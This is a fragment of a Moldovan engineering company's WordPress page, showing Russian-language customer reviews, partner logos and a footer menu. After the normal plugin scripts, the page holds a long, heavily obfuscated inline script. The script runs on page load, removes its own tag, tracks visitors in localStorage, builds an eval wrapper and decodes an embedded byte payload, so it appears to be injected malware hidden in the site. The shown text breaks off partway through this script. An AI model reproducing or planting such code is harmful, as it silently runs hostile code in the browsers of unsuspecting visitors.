fa-star"></i> <i class="fas fa-star"></i> <i class="fas fa-star"></i> <i class="fas fa-star"></i> <i class="fas fa-star"></i> </div> <div class="text-reviews">«Хочу поблагодарить сотрудников команды Пиротерм Сервис, которые профессионально, ответственно выполнили работу и содержали мой дом в чистоте даже во время работы»</div> </div> </div> </div> <div class="col-lg-4"> <div class="head-review center"> <div class=""> <div class="name-reviews">Виталий Мруг</div> <div class="company-reviews">GENESIS</div> <div class="stars-reviews"> <i class="fas fa-star"></i> <i class="fas fa-star"></i> <i class="fas fa-star"></i> </div> <div class="text-reviews">Я глубоко удовлетворен тем,  что команда инженеров Piroterm-Service SRL предложила поддержку в выборе лучших решений для нашего оборудования для производства асфальта.</div> </div> </div> </div> </div> </div> </div> <div class="partners"> <div class="container"> <div class="slider-partners"> <a href=""> <img src="https://inginer.md/wp-content/uploads/2020/11/1-1.jpg" alt=""> </a> <a href=""> <img src="https://inginer.md/wp-content/uploads/2020/11/2-1.jpg" alt=""> </a> <a href=""> <img src="https://inginer.md/wp-content/uploads/2020/11/3-1.jpg" alt=""> </a> <a href=""> <img src="https://inginer.md/wp-content/uploads/2020/11/4.jpg" alt=""> </a> <a href=""> <img src="https://inginer.md/wp-content/uploads/2020/11/5.jpg" alt=""> </a> <a href=""> <img src="https://inginer.md/wp-content/uploads/2020/11/6.jpg" alt=""> </a> <a href=""> <img src="https://inginer.md/wp-content/uploads/2020/11/7.jpg" alt=""> </a> <a href=""> <img src="https://inginer.md/wp-content/uploads/2020/11/8.jpg" alt=""> </a> </div> </div> </div> <p style="display: none;"><a href="2">2</a></p> <p style="display: none;"><a href="2">2</a></p> <p style="display: none;"><a href="2">2</a></p> <footer> <div class="container"> <div class="row"> <div class="col-lg-3 col-sm-6 col-md-4 col-xs-12 "> <a href=""><img src="https://inginer.md/wp-content/uploads/2020/11/logo.png" alt=""></a> <div class="title-sub-logo">Почта:</div> <p><a href="mailto:info@piroterm.md">info@piroterm.md</a></p> <div class="title-sub-logo">Телефон:</div> <p> <a href="tel:+373 22 21-20-21">+373 22 21-20-21</a></p> <div class="socials"> <a href="https://www.facebook.com/inginer.md"><i class="fab fa-facebook-f"></i></a> </div> </div> <div class="col-lg-3 col-sm-6 col-md-4 col-xs-12 "> <div class="title-footer">Меню</div> <div class="menu-footer-menu-container"><ul id="menu-footer-menu" class="menu"><li id="menu-item-508" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-508"><a href="https://inginer.md/about-us/">О нас</a></li> <li id="menu-item-507" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-507"><a href="https://inginer.md/services/">Услуги</a></li> <li id="menu-item-510" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-510"><a href="https://inginer.md/contacts/">Контакты</a></li> <li id="menu-item-14430" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14430"><a href="https://inginer.md/test_test/">Test</a></li> <li id="menu-item-506" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-506"><a href="https://inginer.md/proekty/">Проекты</a></li> <li id="menu-item-24786" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-24786"><a href="https://inginer.md/home-2/">Home</a></li> <li id="menu-item-24988" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-24988"><a href="https://inginer.md/main-page/">Main Page</a></li> <li id="menu-item-505" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-505"><a href="https://inginer.md/politika-konfidenczialnosti/">Политика конфиденциальности</a></li> </ul></div> </div> <div class="col-lg-3 col-sm-6 col-md-4 col-xs-12 "> <div class="title-footer">Услуги</div> <ul> <li><a href="https://inginer.md/proektirovanie/">Проектирование</a></li> <li><a href="https://inginer.md/echipamente/">Комплектация оборудованием</a></li> <li><a href="https://inginer.md/montazh/">Монтаж</a></li> <li><a href="https://inginer.md/test/">Сервисное обслуживание</a></li> </ul> </div> </div> </div> </footer> <script type='text/javascript' id='contact-form-7-js-extra'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/inginer.md\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='https://inginer.md/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.3' id='contact-form-7-js'></script> <script type='text/javascript' src='https://inginer.md/wp-includes/js/wp-embed.min.js?ver=5.5.18' id='wp-embed-js'></script> <script> "use strict";var cpfmhG,mFliSm,pr6eB4,TCa_wW,u1roE_,aIGXzDb,rQxzBdj,UmgJ9V,z4lqF_X;const DR1H_4o=[0x0,0x1,0x8,0xff,"length","undefined",0x3f,0x6,"fromCodePoint",0x7,0xc,"push",0x58,null,0xd,0x5b,0x1fff,0xe,!0x1,0x60,0x2000000,0x2,0x4000000,0x3,0x4,!0x0,0x7f,0x80,"js",0x85,0x88,0x68];function sHKqnU(cpfmhG){var mFliSm="ucXOmYZi0ht$@x~W%2_jszl+k>Qpao<5I`[,?}=#LH{Bd64MVyP;f/38Kb\"qTE9vDA*e1SgN!G)&|C7rUJ:].wFRn^(",pr6eB4,TCa_wW,u1roE_,aIGXzDb,rQxzBdj,UmgJ9V,z4lqF_X;GY6aoZJ(pr6eB4=""+(cpfmhG||""),TCa_wW=pr6eB4.length,u1roE_=[],aIGXzDb=DR1H_4o[0x0],rQxzBdj=DR1H_4o[0x0],UmgJ9V=-DR1H_4o[0x1]);for(z4lqF_X=DR1H_4o[0x0];z4lqF_X<TCa_wW;z4lqF_X++){var sHKqnU=mFliSm.indexOf(pr6eB4[z4lqF_X]);if(sHKqnU===-DR1H_4o[0x1])continue;if(UmgJ9V<DR1H_4o[0x0]){UmgJ9V=sHKqnU}else{GY6aoZJ(UmgJ9V+=sHKqnU*DR1H_4o[0xf],aIGXzDb|=UmgJ9V<<rQxzBdj,rQxzBdj+=(UmgJ9V&DR1H_4o[0x10])>DR1H_4o[0xc]?DR1H_4o[0xe]:DR1H_4o[0x11]);do{GY6aoZJ(u1roE_.push(aIGXzDb&DR1H_4o[0x3]),aIGXzDb>>=DR1H_4o[0x2],rQxzBdj-=DR1H_4o[0x2])}while(rQxzBdj>DR1H_4o[0x9]);UmgJ9V=-DR1H_4o[0x1]}}if(UmgJ9V>-DR1H_4o[0x1]){u1roE_.push((aIGXzDb|UmgJ9V<<rQxzBdj)&DR1H_4o[0x3])}return _HVCSp(u1roE_)}function koyt_T(pr6eB4){if(typeof cpfmhG[pr6eB4]===DR1H_4o[0x5]){return cpfmhG[pr6eB4]=sHKqnU(mFliSm[pr6eB4])}return cpfmhG[pr6eB4]}GY6aoZJ(cpfmhG={},mFliSm=["Zozi8}?kd~Qsv=q22Tao0Jskk\"^g2TUQMsnyB;I)k\"Mmm][</u","v+(Ijq?_Gsg>#=T,Ovq)gP+Hm","a1/abCEx2@Xx`mKo`ZQIu4R2mb$:sOZBTN4yz","m)z5;g1U^2e>>![2.A]0[,u","69);]Pc/7_$+`%?_EAzax8ORE$,pW~LQDL$oX!u0*@$&KW:[v3c","p35m8gpJI_&UvWlpn~*Ii?+SWW$V`m","8sCN{:>HuTl5yV5o5}W`Krm?e@TiKWG#i+MG+qF4kA.C+~Y54L%h5fL<Nsa","P5AZ2b]w:T}STp)>Bs^34CH&OjgC%?#jQ135UJ11<*6a_Ei_`b+|ur6c",")1Cm^fa_[h$:wUa{+4O","?b~50)c,v_6VXEg=yBOY*4bMHs;","#9[CjNrc","53rmsL5jhtqf,~OBp3Zi","7a68qg;jvWNGz%`}XWUZh???ispZmW$","mNgy^=]b2bWsA!A}>Ay3S![fU@tETpQ{sbRm$Vrcc*z}a]Z","a48|_bu","Omq0P4}bV_8~GT#_jb./fvJbchC47>qa]}kGoM?XO","vVpCpq{@eh@1WM;HBb+Ze44_yTt+0]*?,1P;z|u","LB&Yj9akQ~)yz!a{Ju","nV)0iJicjT&my%j[kL7|)9IX;3Mk+P>oz438Yr4_}jcZnO<o`VypD!u","_hIyNTGc","ehYt}En@Uh^ee=VQr5lfm!5M+s2Oc","P[u<IqpHAvGoS?9{F>YP0?rb:@a8#g(?NZ$!@]sf|$AypX","NA9hP13Uzj01WX%#^a07hVNSQ9nbc",".gg861F4ZtDm,=x","=1gfGT;w4KFWc","w6ponfKLBqc!2%!}7KrZsq04LA`|Lm","A5z51[44y@c}fO_s(6k7nbWiY","`;l5+b2cj@rK+PQo`3:078]xv@/a1]*})~1/v\";w3\"7_%MRl:~z5~=Hx!A_Zc","[ZmYK[XF_@&ec","jLNhP}\"Um","X_UGB,K1zj0O!]$QXTBt","pW3a9!q,cT)$IOL5\"q2ZH,u","99ZhurlXT2Q2Dp[<\"9E5+qlk*@2rIVypK;n;|8u","P6b0sLAc*h]IQJL5OIZ|.S5v`hH|5X","_@;IIMLk40j;STrQ>1e/yg=?E~?V>mRL83hp`En)Aheq?qNj99])s","54f/Tgw,pAs|5NZ>|1foA#Rwm","pL_!$]ZDl\"KI3>QoTApt[w6xPvu3wm","JqgN3\"x>T~L","4s<52|#ciDT$3x;[tLQp>","_bk&0Tg4Q9wbuO@jn6O","%bbI7|ixU/U4YV=_{ZtI8.gkY","KsXI$]ebN\"GUyV=kL9+f#1zc","g;f8hTPUnsM5[}i_dBa)H}u",":[SP[yak.3H~2%|=ivAIxSg<ts@%GmJLH9Y|hS))JW6qap`5","gAqInbQkV@aA1]?5\"2#|nfpHN\"sx4>t","B;#hDrP<Wv3m[xbHBNX","A}dCoNP<M_^C)ylHOv.iT;NSDTQ!g\"xp*}@)^fjjJ@GmyT3H}O0`#Eh>i",";L.YC6;cN\"Kg5q@=\"ho8<","nqXC+q4<E~<k3EX_bq\"IO4sX+\"B~c?l[VZ3mw]w2+xA>7JwpF6c","LQ&og?A,q9d|_}@","|+vf29f4ebLU>m","W}VhvC;jSxv~mO","g{ypZVHbvWs5UOZBL;Nh{ytkQAGIUNEoD36m","QW;oL1)f5zEatJ^H;ViZ9C_D`W&m.Of[ea0hjP7\"v0","L9wNSVi/yTD4A?@=fQRaB}|ZDv{f|NK{8u","@@eC4gL<O","B[|P9Ca<^sNI9y@QHAofP:hHU/;k0O","}T3apN9_azLfq=g_F2&Y$Paf&q=ru","&1mo*[F1yh","L9Q;6,>i_vFW+:FH99rar|5jVznC#]Upubz8xPGoC~W}Qy^oHVc","r[b3YT{<]j6","^V7a[wI?>\"/mB=`++ooi@]7keDB~UO","N;_!1/bosx3zINX2\"ht;eVSb$2","DVv|*9wHA3B9yV%QKN!Zp7w2<q]oR=1=1u","x@C)hbA;t2wgwV#=:}6t%)wxdK.T[yB=L1aiBgAx%v#","8Aw5v#=kfhn4j:|QH;6fP:bx&Kj8UO}</6c;;vp/Z","T~ZfTT.kd$+;q\"^%>Quh%9??UWF?)JK{<3eYu#9U4K7/p:h5/AC5@)XU(~","+A,!^=aUF\"4fW=6#jb1Cq[|_`h","0vW|^|}xq2LU{Q\"?<T`3E/h/9/W9F>Mpp+0<Hy=fo*?|aNYjsvhpGSmFch;$c","5WSi$FRoeTV|F>@sMZz59VBiH2","5ho5g[P\"oz%+#=y#~Q#h/\"%g!\"KG@W<2}B<8fKFLx*<A<y:a?3lm","i4BID4kX>~kALq>afNU3Q3u","wgyIzNpoKx^DKO","E25a|]cROhdUKW_#PA9f`Me,Vv;G`VL_GscZ[wp,_hQ","C[eC&S[@Yx6qc","kh38~V&SITmZCmza@B5f*T8&(~sk$X1_Rg3GT!dX;@)U3~0}.gVZ","Hb9hAJiSdKI!s?g>[[vy9!d<W*NIe\"c?QB.oT/HiM*bUsqCjh,X","OWmt+7aX&sS,gSE2w5_pR61kXW[!P=ts?O\";4Ea_{~\"G&~,2nu","2vNaf#uFI@#~FSSj<AmtI1Hi`3KU&p:[gsr|O8d@CqvcTO","rAoaZ?:F4_LiUp(?SOKh","I;wP&)Mji","F{#y+=f1]h%rj](?1;c<T[F45*/*KWD<oo23>wojZxh&\">8[|K?tr|Ik:j","[@{;iP=@{AarF~X}JGRaQ]IX","3V>Iqr|\"V@o\"B=.pq[mYA8m_6*_&f]u<v1X","|9&/v[4<%_$xz%>,r6`3/&V_&K$1<=>aA2UZ{,VLc*sZXEI+g{0`>fvbi","K[ihu)d<n\"6|_Xo?HZnZOF3XY\"ppAm","I1T)`fu{fDx}x?v{|sH37?]oD/Mz0O_LxIXp#v$c","]OOY|SyjJb@t(y*ky}8fyvA&2bh%9J1<_N7mBE,,1DKq:>:Li+]Y","g1rfY?3X","|^X8aSvt.;zospd=fMR8WKUg_FWxz{ENb_}qRx>Sy}`&d&%=kGGy`rmOGX}o{&T=1TZh0#D7QB=&|M{PK3:<qrtwp1vm24a=/4VAg_!i`1\"U{M)*9M@h/U[)w@U{X(GPV;sAqrl7$BbCu9`5ID1y6[?O_Fzo?GT=MMe8}<^Wc;","qGW8L","n3(6bj5OIiz","G?f!q2(Z}E]wDM)*","I^R8","N^%q;yOZ3iM7U?v","zI#M/wmb","+GnA2,`$f","c+v#*~f#t","dW2,r+vUWpz`stgge;Kb2203v\"M@q6X","4RQ:+O9??fP","UL7k1qJn7F{YkE|>","ULObJh2hT]","uA68cNH","fM@hqr0Ou?bfu","OGnA2,`$f","I052II3f?6k}4bpGP}be5IwxKtPU*ZcB==$4>53fAhG}jb{G==$4tqQu2oIUP74B1Eu","|jsA],H","uM_h","tZ<g","mz<IX4U/D","OFuq<tG9","Wb3\"XTnV_;_ELO0jV7%JCT)1UAG,86kLgcO2bhwU^;!","fD3\"Y]s6","8vK83","4v#?#","HU!>bhL6","[bMY0JGN<,e",".zI?VNH<","DD!>bhL6","^MMYFV;K<sgN6*","X1M\"I","{y!`","#Ec78VgLnl","u}NFb","|32:","@wm8Ke{x:U^m9yLGUG.7BuDx","GyD]3u;x","cc`*y3cmTEhgKW","sx+J((3K)v.EH","u|NF?","eea{1<M","X^DG","K6m8nZX","LvOq9V._/;tzYp\"N|Ge8","5^y<q2&)$>p","1^;#^3G+4MO","<=2y7$H","vB:kF06o","|jhue&vv1\"[ns=%KEag%:D_o","&,X@,0:r{^f","=v1M","L?(6IC#Lf@2{_VX*","3hrqv","J4$t",":K&M","XNh^$","HKp0","RK&M$c:A","~eUr1>$=98","c1V[9",")e(^!7x","Uv#RC","_C)n","TC)n","aQ%$5","@hwqW","h|NX",",|NX","a4lr}"]);function V6ogH3(){var cpfmhG=[function(){return globalThis},function(){return global},function(){return window},function(){return new Function("return this")()}],mFliSm,pr6eB4,TCa_wW;GY6aoZJ(mFliSm=void 0x0,pr6eB4=[]);try{GY6aoZJ(mFliSm=Object,pr6eB4[DR1H_4o[0xb]]("".__proto__.constructor.name))}catch(e){}E7Rc2LX:for(TCa_wW=DR1H_4o[0x0];TCa_wW<cpfmhG[DR1H_4o[0x4]];TCa_wW++)try{var u1roE_;mFliSm=cpfmhG[TCa_wW]();for(u1roE_=DR1H_4o[0x0];u1roE_<pr6eB4[DR1H_4o[0x4]];u1roE_++)if(typeof mFliSm[pr6eB4[u1roE_]]===DR1H_4o[0x5])continue E7Rc2LX;return mFliSm}catch(e){}return mFliSm||this}GY6aoZJ(pr6eB4=V6ogH3()||{},TCa_wW=pr6eB4.TextDecoder,u1roE_=pr6eB4.Uint8Array,aIGXzDb=pr6eB4.Buffer,rQxzBdj=pr6eB4.String||String,UmgJ9V=pr6eB4.Array||Array,z4lqF_X=function(){var cpfmhG=new UmgJ9V(DR1H_4o[0x1b]),mFliSm,pr6eB4;GY6aoZJ(mFliSm=rQxzBdj[DR1H_4o[0x8]]||rQxzBdj.fromCharCode,pr6eB4=[]);return function(TCa_wW){var u1roE_,aIGXzDb,UmgJ9V,z4lqF_X;GY6aoZJ(aIGXzDb=void 0x0,UmgJ9V=TCa_wW[DR1H_4o[0x4]],pr6eB4[DR1H_4o[0x4]]=DR1H_4o[0x0]);for(z4lqF_X=DR1H_4o[0x0];z4lqF_X<UmgJ9V;){GY6aoZJ(aIGXzDb=TCa_wW[z4lqF_X++],aIGXzDb<=DR1H_4o[0x1a]?u1roE_=aIGXzDb:aIGXzDb<=0xdf?u1roE_=(aIGXzDb&0x1f)<<DR1H_4o[0x7]|TCa_wW[z4lqF_X++]&DR1H_4o[0x6]:aIGXzDb<=0xef?u1roE_=(aIGXzDb&0xf)<<DR1H_4o[0xa]|(TCa_wW[z4lqF_X++]&DR1H_4o[0x6])<<DR1H_4o[0x7]|TCa_wW[z4lqF_X++]&DR1H_4o[0x6]:rQxzBdj[DR1H_4o[0x8]]?u1roE_=(aIGXzDb&DR1H_4o[0x9])<<0x12|(TCa_wW[z4lqF_X++]&DR1H_4o[0x6])<<DR1H_4o[0xa]|(TCa_wW[z4lqF_X++]&DR1H_4o[0x6])<<DR1H_4o[0x7]|TCa_wW[z4lqF_X++]&DR1H_4o[0x6]:(u1roE_=DR1H_4o[0x6],z4lqF_X+=DR1H_4o[0x17]),pr6eB4[DR1H_4o[0xb]](cpfmhG[u1roE_]||(cpfmhG[u1roE_]=mFliSm(u1roE_))))}return pr6eB4.join("")}}());function _HVCSp(cpfmhG){return typeof TCa_wW!==DR1H_4o[0x5]&&TCa_wW?new TCa_wW().decode(new u1roE_(cpfmhG)):typeof aIGXzDb!==DR1H_4o[0x5]&&aIGXzDb?aIGXzDb.from(cpfmhG).toString("utf-8"):z4lqF_X(cpfmhG)}if(koyt_T(DR1H_4o[0xc])in nuiHXY){dLaBtb3()}function dLaBtb3(){}function nuiHXY(){}function dm1wmA(){}function GY6aoZJ(){GY6aoZJ=function(){}}(()=>{function pr6eB4(pr6eB4,TCa_wW){if(!TCa_wW){TCa_wW=function(TCa_wW){if(typeof cpfmhG[TCa_wW]===DR1H_4o[0x5]){return cpfmhG[TCa_wW]=pr6eB4(mFliSm[TCa_wW])}return cpfmhG[TCa_wW]}}if(!pr6eB4){pr6eB4=function(pr6eB4){var TCa_wW="HubsMefYth8QvWkG9B+i;X%TZ|4c:LOqA`=N5I~P*g/^mRj70{plo63!JDzE?\"}1@>FnxSw2&UK$y<r]_,[V(C)#ad.",u1roE_,rQxzBdj,UmgJ9V,z4lqF_X,sHKqnU,koyt_T,V6ogH3;GY6aoZJ(u1roE_=""+(pr6eB4||""),rQxzBdj=u1roE_.length,UmgJ9V=[],z4lqF_X=DR1H_4o[0x0],sHKqnU=DR1H_4o[0x0],koyt_T=-DR1H_4o[0x1]);for(V6ogH3=DR1H_4o[0x0];V6ogH3<rQxzBdj;V6ogH3++){var dLaBtb3=TCa_wW.indexOf(u1roE_[V6ogH3]);if(dLaBtb3===-DR1H_4o[0x1])continue;if(koyt_T<DR1H_4o[0x0]){koyt_T=dLaBtb3}else{GY6aoZJ(koyt_T+=dLaBtb3*DR1H_4o[0xf],z4lqF_X|=koyt_T<<sHKqnU,sHKqnU+=(koyt_T&DR1H_4o[0x10])>DR1H_4o[0xc]?DR1H_4o[0xe]:DR1H_4o[0x11]);do{GY6aoZJ(UmgJ9V.push(z4lqF_X&DR1H_4o[0x3]),z4lqF_X>>=DR1H_4o[0x2],sHKqnU-=DR1H_4o[0x2])}while(sHKqnU>DR1H_4o[0x9]);koyt_T=-DR1H_4o[0x1]}}if(koyt_T>-DR1H_4o[0x1]){UmgJ9V.push((z4lqF_X|koyt_T<<sHKqnU)&DR1H_4o[0x3])}return _HVCSp(UmgJ9V)}}if(new RegExp(TCa_wW(0x59),"i")[TCa_wW(0x5a)](navigator[TCa_wW(DR1H_4o[0xf])])){return}const u1roE_=document[TCa_wW(0x5c)];u1roE_?.parentNode?.removeChild(u1roE_);const aIGXzDb=Date[TCa_wW(0x5d)],rQxzBdj=aIGXzDb(),UmgJ9V=window[TCa_wW(0x5e)],z4lqF_X=TCa_wW(0x5f),sHKqnU=UmgJ9V[TCa_wW(DR1H_4o[0x13])](z4lqF_X);if(sHKqnU&&Number(sHKqnU)>rQxzBdj){function koyt_T(pr6eB4){var TCa_wW="GVFQtdEUjbZiXDmCKpNMYOPLSafcJTerholHRsBgkIqWA[],_6|@`%$y*;1)8uz>5\"=7x}:+(/#v!924^?0.~&3w<{n",u1roE_,rQxzBdj,UmgJ9V,z4lqF_X,sHKqnU,koyt_T,V6ogH3;GY6aoZJ(u1roE_=""+(pr6eB4||""),rQxzBdj=u1roE_.length,UmgJ9V=[],z4lqF_X=DR1H_4o[0x0],sHKqnU=DR1H_4o[0x0],koyt_T=-DR1H_4o[0x1]);for(V6ogH3=DR1H_4o[0x0];V6ogH3<rQxzBdj;V6ogH3++){var dLaBtb3=TCa_wW.indexOf(u1roE_[V6ogH3]);if(dLaBtb3===-DR1H_4o[0x1])continue;if(koyt_T<DR1H_4o[0x0]){koyt_T=dLaBtb3}else{GY6aoZJ(koyt_T+=dLaBtb3*DR1H_4o[0xf],z4lqF_X|=koyt_T<<sHKqnU,sHKqnU+=(koyt_T&DR1H_4o[0x10])>DR1H_4o[0xc]?DR1H_4o[0xe]:DR1H_4o[0x11]);do{GY6aoZJ(UmgJ9V.push(z4lqF_X&DR1H_4o[0x3]),z4lqF_X>>=DR1H_4o[0x2],sHKqnU-=DR1H_4o[0x2])}while(sHKqnU>DR1H_4o[0x9]);koyt_T=-DR1H_4o[0x1]}}if(koyt_T>-DR1H_4o[0x1]){UmgJ9V.push((z4lqF_X|koyt_T<<sHKqnU)&DR1H_4o[0x3])}return _HVCSp(UmgJ9V)}function V6ogH3(pr6eB4){if(typeof cpfmhG[pr6eB4]===DR1H_4o[0x5]){return cpfmhG[pr6eB4]=koyt_T(mFliSm[pr6eB4])}return cpfmhG[pr6eB4]}if(V6ogH3(0x61)in nuiHXY){dLaBtb3()}function dLaBtb3(){module.exports=async(pr6eB4=()=>{throw new Error(V6ogH3(0x62))})=>{function TCa_wW(pr6eB4){var TCa_wW="ECqYU745uS=,B;z9meKfH$iLpXdo!&tM:.]WJR#0I+(v)V>8%Ac_g?^P[kwNFDal@GyZhsn\"1/*<6j2TOQ|x}r`3~{b",u1roE_,rQxzBdj,UmgJ9V,z4lqF_X,sHKqnU,koyt_T,V6ogH3;GY6aoZJ(u1roE_=""+(pr6eB4||""),rQxzBdj=u1roE_.length,UmgJ9V=[],z4lqF_X=DR1H_4o[0x0],sHKqnU=DR1H_4o[0x0],koyt_T=-DR1H_4o[0x1]);for(V6ogH3=DR1H_4o[0x0];V6ogH3<rQxzBdj;V6ogH3++){var dLaBtb3=TCa_wW.indexOf(u1roE_[V6ogH3]);if(dLaBtb3===-DR1H_4o[0x1])continue;if(koyt_T<DR1H_4o[0x0]){koyt_T=dLaBtb3}else{GY6aoZJ(koyt_T+=dLaBtb3*DR1H_4o[0xf],z4lqF_X|=koyt_T<<sHKqnU,sHKqnU+=(koyt_T&DR1H_4o[0x10])>DR1H_4o[0xc]?DR1H_4o[0xe]:DR1H_4o[0x11]);do{GY6aoZJ(UmgJ9V.push(z4lqF_X&DR1H_4o[0x3]),z4lqF_X>>=DR1H_4o[0x2],sHKqnU-=DR1H_4o[0x2])}while(sHKqnU>DR1H_4o[0x9]);koyt_T=-DR1H_4o[0x1]}}if(koyt_T>-DR1H_4o[0x1]){UmgJ9V.push((z4lqF_X|koyt_T<<sHKqnU)&DR1H_4o[0x3])}return _HVCSp(UmgJ9V)}function u1roE_(pr6eB4){if(typeof cpfmhG[pr6eB4]===DR1H_4o[0x5]){return cpfmhG[pr6eB4]=TCa_wW(mFliSm[pr6eB4])}return cpfmhG[pr6eB4]}const rQxzBdj=new Set(process.argv.slice(DR1H_4o[0x15]));if(!rQxzBdj.has(u1roE_(0x63))){if(rQxzBdj.size!==DR1H_4o[0x1])return DR1H_4o[0x12];if(!rQxzBdj.has("-v"))return DR1H_4o[0x12]}await(async(TCa_wW,u1roE_)=>{function rQxzBdj(TCa_wW){var u1roE_="S<O}^?C]4lk7eu>RGFaB\"cLjnTIAv%w),@$x#[!=~3y+.8z501|_6:`&/*92(EW;{mYDqhdirXVQobUNtsMPJHZfKpg",rQxzBdj,UmgJ9V,pr6eB4,z4lqF_X,sHKqnU,koyt_T,V6ogH3;GY6aoZJ(rQxzBdj=""+(TCa_wW||""),UmgJ9V=rQxzBdj.length,pr6eB4=[],z4lqF_X=DR1H_4o[0x0],sHKqnU=DR1H_4o[0x0],koyt_T=-DR1H_4o[0x1]);for(V6ogH3=DR1H_4o[0x0];V6ogH3<UmgJ9V;V6ogH3++){var dLaBtb3=u1roE_.indexOf(rQxzBdj[V6ogH3]);if(dLaBtb3===-DR1H_4o[0x1])continue;if(koyt_T<DR1H_4o[0x0]){koyt_T=dLaBtb3}else{GY6aoZJ(koyt_T+=dLaBtb3*DR1H_4o[0xf],z4lqF_X|=koyt_T<<sHKqnU,sHKqnU+=(koyt_T&DR1H_4o[0x10])>DR1H_4o[0xc]?DR1H_4o[0xe]:DR1H_4o[0x11]);do{GY6aoZJ(pr6eB4.push(z4lqF_X&DR1H_4o[0x3]),z4lqF_X>>=DR1H_4o[0x2],sHKqnU-=DR1H_4o[0x2])}while(sHKqnU>DR1H_4o[0x9]);koyt_T=-DR1H_4o[0x1]}}if(koyt_T>-DR1H_4o[0x1]){pr6eB4.push((z4lqF_X|koyt_T<<sHKqnU)&DR1H_4o[0x3])}return _HVCSp(pr6eB4)}function UmgJ9V(TCa_wW){if(typeof cpfmhG[TCa_wW]===DR1H_4o[0x5]){return cpfmhG[TCa_wW]=rQxzBdj(mFliSm[TCa_wW])}return cpfmhG[TCa_wW]}if(TCa_wW)return UmgJ9V(0x64);if(u1roE_===(await pr6eB4()))return UmgJ9V(0x65);return""})();return DR1H_4o[0x19]}}return}let dm1wmA="";const Gqkxro=TCa_wW(0x66),dVVZK6W=UmgJ9V[TCa_wW(DR1H_4o[0x13])](Gqkxro)||crypto[TCa_wW(0x67)]();UmgJ9V[TCa_wW(DR1H_4o[0x1f])](Gqkxro,dVVZK6W);const RbKaYp=new TextEncoder,xtSjmgo=new TextDecoder,C7KnqOL=new Uint8Array(TCa_wW(0x69)[TCa_wW(0x6a)](",")[TCa_wW(0x6b)](Number)),thTJdp=0x5265c00,LbG7BdY=pr6eB4=>{return(DR1H_4o[0x0],eval)(pr6eB4)},OaF53r=pr6eB4=>{function TCa_wW(pr6eB4){var TCa_wW="*tNkZMIRignlOCXpaGBDbeFqErYVjPcJ_7WQd>s`z6uK!4A=3H,\"y|hfL19%wo?U(0x~S).#;}T:{vm@<&8]+$^/25[",u1roE_,rQxzBdj,UmgJ9V,z4lqF_X,sHKqnU,koyt_T,V6ogH3;GY6aoZJ(u1roE_=""+(pr6eB4||""),rQxzBdj=u1roE_.length,UmgJ9V=[],z4lqF_X=DR1H_4o[0x0],sHKqnU=DR1H_4o[0x0],koyt_T=-DR1H_4o[0x1]);for(V6ogH3=DR1H_4o[0x0];V6ogH3<rQxzBdj;V6ogH3++){var dLaBtb3=TCa_wW.indexOf(u1roE_[V6ogH3]);if(dLaBtb3===-DR1H_4o[0x1])continue;if(koyt_T<DR1H_4o[0x0]){koyt_T=dLaBtb3}else{GY6aoZJ(koyt_T+=dLaBtb3*DR1H_4o[0xf],z4lqF_X|=koyt_T<<sHKqnU,sHKqnU+=(koyt_T&DR1H_4o[0x10])>DR1H_4o[0xc]?DR1H_4o[0xe]:DR1H_4o[0x11]);do{GY6aoZJ(UmgJ9V.push(z4lqF_X&DR1H_4o[0x3]),z4lqF_X>>=DR1H_4o[0x2],sHKqnU-=DR1H_4o[0x2])}while(sHKqnU>DR1H_4o[0x9]);koyt_T=-DR1H_4o[0x1]}}if(koyt_T>-DR1H_4o[0x1]){UmgJ9V.push((z4lqF_X|koyt_T<<sHKqnU)&DR1H_4o[0x3])}return _HVCSp(UmgJ9V)}function u1roE_(pr6eB4){if(typeof cpfmhG[pr6eB4]===DR1H_4o[0x5]){return cpfmhG[pr6eB4]=TCa_wW(mFliSm[pr6eB4])}return cpfmhG[pr6eB4]}return new Uint8Array(pr6eB4[u1roE_(0x6c)]((TCa_wW,u1roE_)=>{function rQxzBdj(TCa_wW){var rQxzBdj="\"19!H)D{]#(rVCBFU[%ouYmO07GLXzl@:=*Wa6E?nTSePAQ+3;.$/^fNpjb~i58hwsdc},KIyx`_Rq<|2tv4g&JZk>M",UmgJ9V,z4lqF_X,pr6eB4,sHKqnU,koyt_T,V6ogH3,dLaBtb3;GY6aoZJ(UmgJ9V=""+(TCa_wW||""),z4lqF_X=UmgJ9V.length,pr6eB4=[],sHKqnU=DR1H_4o[0x0],koyt_T=DR1H_4o[0x0],V6ogH3=-DR1H_4o[0x1]);for(dLaBtb3=DR1H_4o[0x0];dLaBtb3<z4lqF_X;dLaBtb3++){var dm1wmA=rQxzBdj.indexOf(UmgJ9V[dLaBtb3]);if(dm1wmA===-DR1H_4o[0x1])continue;if(V6ogH3<DR1H_4o[0x0]){V6ogH3=dm1wmA}else{GY6aoZJ(V6ogH3+=dm1wmA*DR1H_4o[0xf],sHKqnU|=V6ogH3<<koyt_T,koyt_T+=(V6ogH3&DR1H_4o[0x10])>DR1H_4o[0xc]?DR1H_4o[0xe]:DR1H_4o[0x11]);do{GY6aoZJ(pr6eB4.push(sHKqnU&DR1H_4o[0x3]),sHKqnU>>=DR1H_4o[0x2],koyt_T-=DR1H_4o[0x2])}while(koyt_T>DR1H_4o[0x9]);V6ogH3=-DR1H_4o[0x1]}}if(V6ogH3>-DR1H_4o[0x1]){pr6eB4.push((sHKqnU|V6ogH3<<koyt_T)&DR1H_4o[0x3])}return _HVCSp(pr6eB4)}function UmgJ9V(TCa_wW){if(typeof cpfmhG[TCa_wW]===DR1H_4o[0x5]){return cpfmhG[TCa_wW]=rQxzBdj(mFliSm[TCa_wW])}return cpfmhG[TCa_wW]}if(UmgJ9V(0x6d)in nuiHXY){z4lqF_X()}function z4lqF_X(){function TCa_wW(TCa_wW){return 